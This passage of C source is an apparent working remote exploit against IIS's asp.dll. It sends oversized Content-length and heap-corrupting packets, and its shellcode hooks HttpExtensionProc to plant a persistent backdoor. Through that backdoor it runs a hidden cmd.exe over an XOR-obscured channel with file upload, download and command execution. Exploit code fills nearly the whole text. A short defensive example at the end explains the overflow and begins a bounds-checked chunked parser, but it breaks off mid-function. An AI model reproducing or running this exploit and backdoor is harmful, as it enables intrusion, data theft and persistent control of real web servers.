    else strcat(buff,buff6);
    // printf("\n send buff:\n%s",buff);
    /*
    i=strlen(buff);
    memset(buff+i,'a',0xc000);
    memset(buff+i+0xc000-strlen(buff7),0,1);
    strcat(buff+i+0xc000-0x10-strlen(buff7),buff7);
    */
    // strcpy(buff8,buff7);
    /*
    temp=buff7[5];
    temp-=offset*0x10;
    buff7[5]=temp;
    i=*(int *)(buff7+4)+2;
    printf("\nSEH=0x%x\n",i);
    */
    /*
    for(i=0;i<8;++i){
        temp=buff7[i];
        printf("%2x",temp);
    }
    */
    /*
    for(i=0;i<0xc000/0x10;++i){
        strcat(buff,buff7);
    }
    */
    // printf("\nbuff=%s\n",buff);
    // strcat(buff,"\r\n");
    // printf("\n send buff:\n%s",buff);
    // strcpy(buff+OVERADD+NOPLONG,shellcode);
    sendpacketlong=strlen(buff);
    // printf("buff:\n%s",buff+0x10000);
    /*
    #ifdef DEBUG
    _asm{
        lea esp,buff
        add esp,OVERADD
        ret
    }
    #endif
    */
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
    xordatabegin=0;
    for(i=0;i<1;++i){
        j=sendpacketlong;
        // buff[0x2000]=0;
        fprintf(stderr,"\n send packet %d bytes.",j);
        // gets(buff);
        send(fd,buff,j,0);
        // second packet: 0xc000 bytes of 16-byte records that overwrite heap control data
        buff7[0]=MCBSIZE;
        j=MEMSIZE+0x10;
        i=0;
        if(argc>4&&strcmp(argv[4],"winxp")==0) {
            j=0x18;
            i=8;
        }
        for(k=0;i<0xc000;i+=0x10){
            if(i>=j) {
                k=((i-j)/(MCBSIZE*8));
                if(k<=6){
                    memcpy(buff7+0x8,buff10,8);
                    buff7[0x8]=buff8[k];
                    buff7[0xc]=buff9[k];
                }
                else memcpy(buff7,buff11,0x10);
            }
            memcpy(buff+i,buff7,0x10);
        }
        if(argc>4&&strcmp(argv[4],"apache")==0){
            for(k=0xb000;k<=0xc000;k+=2) {
                memset(buff+k,0x0d,1);
                memset(buff+k+1,0x0a,1);
            }
            buff[0xc000]=0;
            // for(k=0;k<0x10;++k)
            send(fd,buff,0xc000,0);
            // printf("\nbuff:%s\n",buff);
        }
        else send(fd,buff,0xc000,0);
        k=0;
        ioctlsocket(fd, FIONBIO, &k);
        j=0;
        while(j==0){
            k=newrecv(fd,recvbuff,BUFFSIZE,0);
            if(k>=8&&strstr(recvbuff,"XORDATA")!=0) {
                xordatabegin=1;
                fprintf(stderr,"\n ok!recv %d bytes\n",k);
                recvbuff[k]=0;
                // printf("\n recv:%s",recvbuff);
                // for(k-=8,j=0;k>0;k-=4,++j)printf("recvdata:0x%x\n",*(int *)(recvbuff+8+4*j));
                k=-1;
                j=1;
            }
            if(k>0){
                recvbuff[k]=0;
                fprintf(stderr,"\n recv:\n %s",recvbuff);
            }
        }
    }
    k=1;
    ioctlsocket(fd, FIONBIO, &k);
    // fprintf(stderr,"\n now begin: \n");
    /*
    for(i=0;i<strlen(SRLF);++i){
        SRLF[i]^=DATAXORCODE;
    }
    send(fd,SRLF,strlen(SRLF),0);
    send(fd,SRLF,strlen(SRLF),0);
    send(fd,SRLF,strlen(SRLF),0);
    */
    // interactive loop: iis* commands are handled locally, anything else goes to cmd.exe
    k=1;
    l=0;
    while(k!=0){
        if(k<0){
            l=0;
            i=0;
            while(i==0){
                gets(buff);
                if(memcmp(buff,"iish",4)==0){
                    iishelp();
                    i=2;
                }
                if(memcmp(buff,"iisput",6)==0){
                    iisput(fd,buff+6);
                    i=2;
                }
                if(memcmp(buff,"iisget",6)==0){
                    iisget(fd,buff+6);
                    i=2;
                }
                if(memcmp(buff,"iiscmd",6)==0){
                    iiscmd(fd,buff+6);
                    i=2;
                }
                if(memcmp(buff,"iisreset",8)==0){
                    iisreset(fd,buff+6);
                    i=2;
                }
                if(memcmp(buff,"iisdie",6)==0){
                    iisdie(fd,buff+6);
                    i=2;
                }
                if(i==2)i=0;
                else i=1;
            }
            k=strlen(buff);
            memcpy(buff+k,SRLF,3);
            // send(fd,SRLF,strlen(SRLF),0);
            // fprintf(stderr,"%s",buff);
            /*
            for(i=0;i<k+2;++i){
                lockintvar2=lockintvar2*0x100;
                lockintvar2=lockintvar2%LOCKBIGNUM;
                lockcharvar=lockintvar2%0x100;
                buff[i]^=lockcharvar; // DATAXORCODE;
                // buff[i]^=DATAXORCODE;
            }
            send(fd,buff,k+2,0);
            */
            newsend(fd,buff,k+2,0);
            // send(fd,SRLF,strlen(SRLF),0);
        }
        k=newrecv(fd,buff,BUFFSIZE,0);
        if(xordatabegin==0&&k>=8&&strstr(buff,"XORDATA")!=0) {
            xordatabegin=1;
            k=-1;
        }
        if(k>0){
            // fprintf(stderr,"recv %d bytes",k);
            /*
            if(xordatabegin==1){
                for(i=0;i<k;++i){
                    lockintvar1=lockintvar1*0x100;
                    lockintvar1=lockintvar1%LOCKBIGNUM;
                    lockcharvar=lockintvar1%0x100;
                    buff[i]^=lockcharvar; // DATAXORCODE;
                }
            }
            */
            l=0;
            buff[k]=0;
            fprintf(stderr,"%s",buff);
        }
        else{
            Sleep(20);
            if(l<20) k=1;
            ++l;
        }
        // if(k==0) break;
    }
    closesocket(fd);
    WSACleanup( );
    fprintf(stderr,"\n the server close connect.");
    gets(buff);
    return(0);
}

// stage-1 decoder: turns the 0x61-based hex encoding back into raw shellcode and jumps to it
void shellcodefnlock()
{
    _asm{
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        jmp next1
    getediadd:
        pop edi
        mov esp,edi
        and esp,0xfffff0f0
        jmp next2
    getshelladd:
        push 0x01
        mov eax,edi
        inc eax
        inc eax
        inc eax
        inc eax
        inc eax
        mov edi,eax
        mov esi,edi
        // sub sp,8
        xor ecx,ecx
    looplock:
        lodsb
        cmp al,cl
        jz shell
        sub al,DATABASE
        mov ah,al
        lodsb
        sub al,DATABASE
        shl ah,4
        add al,ah
        // lea eax,ptr word [edx*4+al]
        stosb
        jmp looplock
    next1:
        call getediadd
    next2:
        call getshelladd
    shell:
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
    }
}

// stage-2 payload: resolves APIs, hooks asp.dll's HttpExtensionProc and serves cmd.exe over the ISAPI connection
void shellcodefn(char *ecb)
{
    char Buff[SHELLBUFFSIZE+2];
    int *except[3];
    FARPROC memcpyadd;
    FARPROC msvcrtdlladd;
    FARPROC HttpExtensionProcadd;
    FARPROC Aspdlladd;
    FARPROC RtlEnterCriticalSectionadd;
    FARPROC Ntdlladd;
    FARPROC Sleepadd;
    FARPROC GetLastErroradd;
    FARPROC GetFileSizeadd;
    FARPROC CreateFileAadd;
    FARPROC WriteFileadd;
    FARPROC ReadFileadd;
    FARPROC PeekNamedPipeadd;
    FARPROC CloseHandleadd;
    FARPROC CreateProcessadd;
    FARPROC CreatePipeadd;
    FARPROC procloadlib;
    FARPROC apifnadd[1];
    FARPROC procgetadd=0;
    FARPROC writeclient;
    FARPROC readclient;
    HCONN ConnID;
    FARPROC shellcodefnadd=ecb;
    char *stradd,*stradd2,*dooradd;
    int imgbase,fnbase,i,k,l,thedoor;
    HANDLE libhandle;
    int fpt; //libwsock32;
    STARTUPINFO siinfo;
    PROCESS_INFORMATION ProcessInformation;
    HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
    int lBytesRead;
    int lockintvar1,lockintvar2;
    char lockcharvar;
    int shelllocknum;
    // unsigned char temp;
    SECURITY_ATTRIBUTES sa;
    _asm {
        jmp nextcall
    getstradd:
        pop stradd
        lea EDI,except
        mov eax,dword ptr FS:[0]
        mov dword ptr [edi+0x08],eax
        mov dword ptr FS:[0],EDI
    }
    except[0]=0xffffffff;
    except[1]=stradd-0x07;
    imgbase=0x77e00000;
    _asm{
        call getexceptretadd
    }
    for(;imgbase<0xbffa0000,procgetadd==0;){
        imgbase+=0x10000;
        if(imgbase==0x78000000) imgbase=0xbff00000;
        if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){
            fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
            k=*(int *)(fnbase+0xc)+imgbase;
            if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
                libhandle=imgbase;
                k=imgbase+*(int *)(fnbase+0x20);
                for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
                    if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor') {
                        k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
                        k+=*(int *)(fnbase+0x10)-1;
                        k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
                        procgetadd=k+imgbase;
                        break;
                    }
                }
            }
        }
    }
    // locate the KERNEL32.DLL module base and the address of the API function GetProcAddress
    // note: (the original comment about the memory pages scanned here is garbled in the source)
    if(procgetadd==0) goto die ;
    i=stradd;
    for(k=1;*stradd!=0;++k) {
        if(*stradd==0x9) libhandle=procloadlib(stradd+1);
        else apifnadd[k]=procgetadd(libhandle,stradd);
        for(;*stradd!=0;++stradd){
        }
        ++stradd;
    }
    ++stradd;
    k=0x7ffdf020;
    *(int *)k=RtlEnterCriticalSectionadd;
    k=stradd;
    stradd=i;
    thedoor=0;
    i=0;
    _asm{
        jmp getdoorcall
    getdooradd:
        pop dooradd;
        mov l,esp
        call getexceptretadd
    }
    if(i==0){
        ++i;
        if(*(int *)ecb==0x90){
            if(*(int *)(*(int *)(ecb+0x64))=='ok!!') {
                i=0;
                thedoor=1;
            }
        }
    }
    if(i!=0){
        *(int *)(dooradd-0x0c)=HttpExtensionProcadd;
        *(int *)(dooradd-0x13)=shellcodefnadd;
        ecb=0;
        _asm{
            call getexceptretadd
        }
        i=ecb;
        i&=0xfffff000;
        ecb=i;
        ecb+=0x1000;
        for(;i<l;++i,++ecb) {
            if(*(int *)ecb==0x90){
                if(*(int *)(ecb+8)==(int *)ecb){
                    if(*(int *)*(int *)(ecb+0x64)=='ok!!') break;
                }
            }
        }
        i=0;
        _asm{
            call getexceptretadd
        }
        i&=0xfffff000;
        i+=0x1000;
        for(;i<l;++i){
            if(*(int *)i==HttpExtensionProcadd){
                *(int *)i=dooradd-7;
                // break;
            }
        }
        // *(int *)(dooradd-0x0c)=HttpExtensionProcadd;
    }
    writeclient= *(int *)(ecb+0x84);
    readclient = *(int *)(ecb+0x88);
    ConnID = *(int *)(ecb+8) ;
    stradd=k;
    _asm{
        lea edi,except
        mov eax,dword ptr [edi+0x08]
        mov dword ptr fs:[0],eax
    }
    if(thedoor==0){
        _asm{
            mov eax,0xffffffff
            mov dword ptr fs:[0],eax
        }
    }
    stradd2=stradd;
    stradd+=8;
    k=0x20;
    writeclient(ConnID,*(int *)(ecb+0x6c),&k,0);
    k=8;
    writeclient(ConnID,stradd+9,&k,0);
    // Sleepadd(100);
    shelllocknum=LOCKBIGNUM2;
    if(*(int *)*(int *)(ecb+0x64)=='ok!!'&&*(int *)(*(int *)(ecb+0x64)+4)=='notx') shelllocknum=0;
    // iiscmd:
    lockintvar1=shelllocknum%LOCKBIGNUM;
    lockintvar2=lockintvar1;
iiscmd:
    /*
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
    */
    sa.nLength=12;
    sa.lpSecurityDescriptor=0;
    sa.bInheritHandle=TRUE;
    CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
    CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);
    // ZeroMemory(&siinfo,sizeof(siinfo));
    _asm{
        lea EDI,siinfo
        xor eax,eax
        mov ecx,0x11
        repnz stosd
    }
    siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    siinfo.wShowWindow = SW_HIDE;
    siinfo.hStdInput = hReadPipe2;
    siinfo.hStdOutput=hWritePipe1;
    siinfo.hStdError =hWritePipe1;
    k=0;
    // while(k==0)
    // {
    k=CreateProcessadd(NULL,stradd2,NULL,NULL,1,0,NULL,NULL,&siinfo, &ProcessInformation);
    // stradd+=8;
    // }
    Sleepadd(200);
    // PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0 );
    i=0;
    while(1) {
        PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
        if(lBytesRead>0) {
            i=0;
            ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
            if(lBytesRead>0) {
                for(k=0;k<lBytesRead;++k){
                    lockintvar2=lockintvar2*0x100;
                    lockintvar2=lockintvar2%LOCKBIGNUM;
                    lockcharvar=lockintvar2%0x100;
                    Buff[k]^=lockcharvar; // DATAXORCODE;
                    // Buff[k]^=DATAXORCODE;
                }
                writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC);
                // Sleepadd(20);
            }
        }
        else{
            // Sleepadd(10);
            l=0;
            if(i<50){
                l=1;
                ++i;
                k=1;
                lBytesRead=0;
            }
            while(l==0){
                i=0;
                lBytesRead=SHELLBUFFSIZE;
                k=readclient(ConnID,Buff,&lBytesRead);
                for(l=0;l<lBytesRead;++l){
                    lockintvar1=lockintvar1*0x100;
                    lockintvar1=lockintvar1%LOCKBIGNUM;
                    lockcharvar=lockintvar1%0x100;
                    Buff[l]^=lockcharvar; // DATAXORCODE;
                }
                if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2]=='s'&&Buff[3]=='c'&&Buff[4]==' '){
                    k=8;
                    WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
                    WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
                    stradd2=Buff+5;
                    Buff[lBytesRead]=0;
                    goto iiscmd;
                }
                if(k==1&&lBytesRead>=5&&Buff[0]=='r'&&Buff[1]=='e'&&Buff[2]=='s'&&Buff[3]=='e'&&Buff[4]=='t'){
                    lBytesRead=0x0c;
                    writeclient(ConnID,stradd+0x11,&lBytesRead,0);
                    lockintvar1=shelllocknum%LOCKBIGNUM;
                    lockintvar2=lockintvar1;
                    lBytesRead=0;
                }
                if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2]=='s'&&Buff[3]=='r'&&Buff[4]=='r'){
                    k=8;
                    WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
                    WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
                    *(int *)(dooradd-0x0c)=0;
                    Sleepadd(0x7fffffff);
                    _asm{
                        mov eax,0
                        mov esp,0
                        jmp eax
                    }
                }
                if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]==' ') {
                    l=*(int *)(Buff+4);
                    // WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
                    fpt=CreateFileAadd(Buff+0x8,FIL
E_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
                    k=GetLastErroradd();
                    i=0;
                    while(l>0){
                        lBytesRead=SHELLBUFFSIZE;
                        k=readclient(ConnID,Buff,&lBytesRead);
                        if(k==1){
                            if(lBytesRead>0){
                                for(k=0;k<lBytesRead;++k){
                                    lockintvar1=lockintvar1*0x100;
                                    lockintvar1=lockintvar1%LOCKBIGNUM;
                                    lockcharvar=lockintvar1%0x100;
                                    Buff[k]^=lockcharvar; // DATAXORCODE;
                                }
                                l-=lBytesRead;
                                // if(fpt>0)
                                WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
                                // else Sleepadd(010);
                            }
                            // if(i>100) l=0;
                        }
                        else {
                            Sleepadd(0100);
                            ++i;
                        }
                        if(i>10000) l=0;
                    }
                    CloseHandleadd(fpt);
                    l=0;
                }
                else{
                    if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]==' '){
                        // fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
                        fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
                        Sleepadd(100);
                        l=GetFileSizeadd(fpt,&k);
                        *(int *)Buff='ezis'; //size
                        *(int *)(Buff+4)=l;
                        lBytesRead=8;
                        for(i=0;i<lBytesRead;++i){
                            lockintvar2=lockintvar2*0x100;
                            lockintvar2=lockintvar2%LOCKBIGNUM;
                            lockcharvar=lockintvar2%0x100;
                            Buff[i]^=lockcharvar; // DATAXORCODE;
                        }
                        writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC);
                        // Sleepadd(100);
                        i=0;
                        while(l>0){
                            k=SHELLBUFFSIZE;
                            ReadFileadd(fpt,Buff,k,&k,0);
                            if(k>0){
                                for(i=0;i<k;++i){
                                    lockintvar2=lockintvar2*0x100;
                                    lockintvar2=lockintvar2%LOCKBIGNUM;
                                    lockcharvar=lockintvar2%0x100;
                                    Buff[i]^=lockcharvar; // DATAXORCODE;
                                }
                                i=0;
                                l-=k;
                                writeclient(ConnID,Buff,&k,0); // HSE_IO_SYNC);
                                // Sleepadd(100);
                                // k=readclient(ConnID,Buff,&lBytesRead);
                            }
                            else ++i;
                            if(i>100) l=0;
                        }
                        CloseHandleadd(fpt);
                        l=0;
                    }
                    else l=1;
                }
            }
            if(k!=1){
                k=8;
                WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
                WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
                WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
                k=GetLastErroradd();
                while(k==0x2746){
                    if(thedoor==1) goto asmreturn;
                    Sleepadd(0x7fffffff); // park this thread
                }
            }
            else{
                WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
                // Sleepadd(1000);
            }
        }
    }
die:
    goto die ;
    _asm{
    asmreturn:
        mov eax,HSE_STATUS_SUCCESS
        leave
        ret 04
    door:
        push eax
        mov eax,[esp+0x08]
        mov eax,[eax+0x64]
        mov eax,[eax]
        cmp eax,'ok!!'
        jnz jmpold
        pop eax
        push 0x12345678 //dooradd-0x13
        ret
    jmpold:
        pop eax
        push 0x12345678 //dooradd-0xc
        ret //1
        jmp door //2
    getdoorcall:
        call getdooradd //5
    getexceptretadd:
        pop eax
        push eax
        mov edi,dword ptr [stradd]
        mov dword ptr [edi-0x0e],eax
        ret
    errprogram:
        mov eax,dword ptr [esp+0x0c]
        add eax,0xb8
        mov dword ptr [eax],0x11223344 //stradd-0xe
        xor eax,eax //2
        ret //1
    execptprogram:
        jmp errprogram //2 bytes stradd-7
    nextcall:
        call getstradd //5 bytes
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
    }
}

// replace the debug build's calls to _chkesp inside the copied shellcode with inc/dec ebx padding
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
    int i,k;
    unsigned char temp;
    char *calladd;
    for(i=0;i<len;++i){
        temp=shellbuff[i];
        if(temp==0xe8){
            k=*(int *)(shellbuff+i+1);
            calladd=fnadd;
            calladd+=k;
            calladd+=i;
            calladd+=5;
            if(calladd==chkesp){
                shellbuff[i]=0x90;
                shellbuff[i+1]=0x43; // inc ebx
                shellbuff[i+2]=0x4b; // dec ebx
                shellbuff[i+3]=0x43;
                shellbuff[i+4]=0x4b;
            }
        }
    }
}

void iisput(int fd,char *str){
    char *filename;
    char *filename2;
    FILE *fpt;
    char buff[0x2000];
    int size=0x2000,i,j,filesize,filesizehigh;
    filename="\0";
    filename2="\0";
    j=strlen(str);
    for(i=0;i<j;++i,++str){
        if(*str!=' '){
            filename=str;
            break;
        }
    }
    for(;i<j;++i,++str){
        if(*str==' ') {
            *str=0;
            break;
        }
    }
    ++i;
    ++str;
    for(;i<j;++i,++str){
        if(*str!=' '){
            filename2=str;
            break;
        }
    }
    for(;i<j;++i,++str){
        if(*str==' ') {
            *str=0;
            break;
        }
    }
    if(filename=="\x0") {
        printf("\n iisput filename [path\\fiename]\n");
        return;
    }
    if(filename2=="\x0") filename2=filename;
    printf("\n begin put file:%s",filename);
    j=0;
    ioctlsocket(fd, FIONBIO, &j);
    Sleep(1000);
    fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
    filesize=GetFileSize(fpt,&filesizehigh);
    strcpy(buff,"put ");
    *(int *)(buff+4)=filesize;
    filesize=*(int *)(buff+4);
    strcpy(buff+0x8,filename2);
    newsend(fd,buff,i+0x9,0);
    printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize);
    Sleep(1000);
    while(filesize>0){
        size=0x800;
        ReadFile(fpt,buff,size,&size,NULL);
        if(size>0){
            filesize-=size;
            newsend(fd,buff,size,0);
            // Sleep(0100);
        }
    }
    // size=filesize;
    // ReadFile(fpt,buff,size,&size,NULL);
    // if(size>0) send(fd,buff,size,0);
    CloseHandle(fpt);
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
    printf("\n put file ok!\n");
    Sleep(1000);
}

void iisget(int fd,char *str){
    char *filename;
    char *filename2;
    FILE *fpt;
    char buff[0x2000];
    int size=0x2000,i,j,filesize,filesizehigh;
    filename="\0";
    filename2="\0";
    j=strlen(str);
    for(i=0;i<j;++i,++str){
        if(*str!=' '){
            filename=str;
            break;
        }
    }
    for(;i<j;++i,++str){
        if(*str==' ') {
            *str=0;
            break;
        }
    }
    ++i;
    ++str;
    for(;i<j;++i,++str){
        if(*str!=' '){
            filename2=str;
            break;
        }
    }
    for(;i<j;++i,++str){
        if(*str==' ') {
            *str=0;
            break;
        }
    }
    if(filename=="\x0") {
        printf("\n iisget filename [path\\fiename]\n");
        return;
    }
    if(filename2=="\x0") filename2=filename;
    printf("\n begin get file:%s",filename);
    fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
    strcpy(buff,"get ");
    strcpy(buff+0x4,filename2);
    newsend(fd,buff,i+0x5,0);
    printf("\n get file:%s from file:%s",filename,filename2);
    j=0;
    ioctlsocket(fd, FIONBIO, &j);
    i=0;
    filesize=0;
    j=0;
    while(j<100){
        // Sleep(100);
        i=newrecv(fd,buff,0x800,0);
        if(i>0){
            buff[i]=0;
            if(memcmp(buff,"size",4)==0){
                filesize=*(int *)(buff+4);
                j=100;
            }
            else {
                /*
                for(j=0;j<i;++j){
                    lockintvar1=lockintvar1*0x100;
                    lockintvar1=lockintvar1%LOCKBIGNUM;
                    lockcharvar=lockintvar1%0x100;
                    buff[j]^=lockcharvar; // DATAXORCODE;
                }
                */
                j=0;
                printf("\n recv %s",buff);
            }
        }
        else ++j;
        // if(j>1000) i=0;
    }
    printf("\n file %d bytes %d\n",filesize,i);
    if(i>8){
        i-=8;
        filesize-=i;
        WriteFile(fpt,buff+8,i,&i,NULL);
    }
    while(filesize>0){
        size=newrecv(fd,buff,0x800,0);
        if(size>0){
            filesize-=size;
            WriteFile(fpt,buff,size,&size,NULL);
        }
        else {
            if(size==0) {
                printf("\n ftp close \n ");
            }
            else {
                printf("\n Sleep(100)");
                Sleep(100);
            }
        }
    }
    CloseHandle(fpt);
    printf("\n get file ok!\n");
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
}

void iisreset(int fd,char *str){
    char buff[0x2000];
    int i,j;
    printf("\nreset xor data.\n");
    Sleep(1000);
    j=0;
    ioctlsocket(fd, FIONBIO, &j);
    strcpy(buff,"reset");
    newsend(fd,buff,strlen(buff),0);
    Sleep(1000);
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
    while(1){
        j=recv(fd,buff,0x2000,0);
        if(j>0){
            buff[j]=0;
            for(i=0;i<j;++i){
                if(buff[i]==0) buff[i]='b';
            }
            // printf("\nrecv 0x%x bytes:%s",j,buff);
            if(strstr(buff,"xordatareset")!=0){
                printf("\nxor data reset ok.\n");
                for(i=strstr(buff,"xordatareset")-buff+0x0c;i<j;++i){
                    lockintvar1=lockintvar1*0x100;
                    lockintvar1=lockintvar1%LOCKBIGNUM;
                    lockcharvar=lockintvar1%0x100;
                    buff[i]^=lockcharvar; // DATAXORCODE;
                }
                break;
            }
        }
        // else if(j==0) break;
        // strcpy(buff,"\r\nmkdir d:\\test6\r\n");
        // newsend(fd,buff,strlen(buff),0);
    }
    Sleep(1000);
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
    // printf("aaa");
}

void iisdie(int fd,char *str){
    char buff[0x200];
    int j;
    printf("\niis die.\n");
    j=0;
    ioctlsocket(fd, FIONBIO, &j);
    Sleep(1000);
    strcpy(buff,"iisrr ");
    newsend(fd,buff,strlen(buff),0);
    Sleep(1000);
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
}

void iiscmd(int fd,char *str){
    char *cmd="\0";
    char buff[2000];
    int i,j;
    j=strlen(str);
    for(i=0;i<j;++i,++str){
        if(*str!=' '){
            cmd=str;
            break;
        }
    }
    j=strlen(str);
    for(i=0;i<j;++i){
        if(*(str+j-i-1)!=' ') {
            break;
        }
        else *(str+j-i-1)=0;
    }
    if(cmd=="\x0") {
        printf("\niiscmd cmd\n");
        return;
    }
    printf("\nbegin run cmd:%s",cmd);
    j=0;
    ioctlsocket(fd, FIONBIO, &j);
    Sleep(1000);
    strcpy(buff,"iisc ");
    strcat(buff,cmd);
    newsend(fd,buff,strlen(buff),0);
    Sleep(1000);
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
    /*
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
    */
}

// recv() wrapper: once "XORDATA" has been seen, every received byte is XORed with the keystream
int newrecv(int fd,char *buff,int size,int flag){
    int i,k;
    k=recv(fd,buff,size,flag);
    if(xordatabegin==1){
        for(i=0;i<k;++i){
            lockintvar1=lockintvar1*0x100;
            lockintvar1=lockintvar1%LOCKBIGNUM;
            lockcharvar=lockintvar1%0x100;
            buff[i]^=lockcharvar; // DATAXORCODE;
        }
    }
    else{
        if(k>0){
            buff[k]=0;
            if(strstr(buff,"XORDATA")!=0) {
                xordatabegin=1;
                for(i=strstr(buff,"XORDATA")-buff+8;i<k;++i){
                    lockintvar1=lockintvar1*0x100;
                    lockintvar1=lockintvar1%LOCKBIGNUM;
                    lockcharvar=lockintvar1%0x100;
                    buff[i]^=lockcharvar; // DATAXORCODE;
                }
            }
        }
    }
    return(k);
}

// send() wrapper: XOR every outgoing byte with the keystream before it hits the wire
int newsend(int fd,char *buff,int size,int flag){
    int i;
    for(i=0;i<size;++i){
        lockintvar2=lockintvar2*0x100;
        lockintvar2=lockintvar2%LOCKBIGNUM;
        lockcharvar=lockintvar2%0x100;
        buff[i]^=lockcharvar; // DATAXORCODE;
        // buff[i]^=DATAXORCODE;
    }
    return(send(fd,buff,size,flag));
}

void iishelp(){
    printf("\nusage:");
    printf("\niisget filename filename. get file from web server.");
    printf("\niisput filename filename. put file to web server.");
    printf("\niiscmd cmd. run cmd on web server.");
    printf("\niisreset. reset the xor data.");
    printf("\niisdie. reset the asp door.");
    printf("\n\n");
}
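The listing above sends a Content-length of 2147506431 or 4294967295 (both at or above 0x80000000, so negative once read into a signed 32-bit length) and follows it with 0xc000 bytes of crafted 16-byte records; the advisory text describes the underlying fault as a heap overflow in the chunked-encoding path. The C below is an added example, not code from the listing and not asp.dll's own parser: it shows the two checks that close that class of bug, a Content-Length parser that refuses to wrap and a chunked-body decoder that bounds every chunk against the remaining output buffer before copying. LENGTH_LIMIT, the function names, the 64-byte demo buffer and the sample bodies are this example's own choices; the bodies are constructed, not captured.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Lengths at or above 0x80000000 go negative in a 32-bit signed int; the
 * listing's Content-length values (2147506431, 4294967295) both sit there. */
#define LENGTH_LIMIT 0x7fffffffu

enum chunk_status {
    CHUNK_OK = 0,
    CHUNK_ERR_SYNTAX,       /* bad size digit or missing CRLF */
    CHUNK_ERR_SIZE_RANGE,   /* declared size above LENGTH_LIMIT */
    CHUNK_ERR_TOO_LARGE,    /* declared size above remaining output space */
    CHUNK_ERR_TRUNCATED     /* input ends before the declared chunk does */
};

/* Decimal Content-Length: the value, or -1 when it is malformed or would
 * pass LENGTH_LIMIT (checked before the multiply, so nothing ever wraps). */
static long long content_length_value(const char *s)
{
    uint32_t v = 0;
    size_t i;
    if (s[0] == '\0') return -1;
    for (i = 0; s[i] != '\0'; i++) {
        unsigned d;
        if (s[i] < '0' || s[i] > '9') return -1;
        d = (unsigned)(s[i] - '0');
        if (v > (LENGTH_LIMIT - d) / 10) return -1;   /* v*10+d would exceed the limit */
        v = v * 10 + d;
    }
    return (long long)v;
}

/* Hex chunk-size line "SIZE[;ext]\r\n"; *adv receives the bytes consumed. */
static enum chunk_status parse_chunk_size(const char *p, size_t n,
                                          uint32_t *size, size_t *adv)
{
    uint32_t v = 0;
    size_t i;
    int digits = 0;
    for (i = 0; i < n; i++) {
        unsigned d;
        char c = p[i];
        if (c >= '0' && c <= '9')      d = (unsigned)(c - '0');
        else if (c >= 'a' && c <= 'f') d = (unsigned)(c - 'a') + 10;
        else if (c >= 'A' && c <= 'F') d = (unsigned)(c - 'A') + 10;
        else break;
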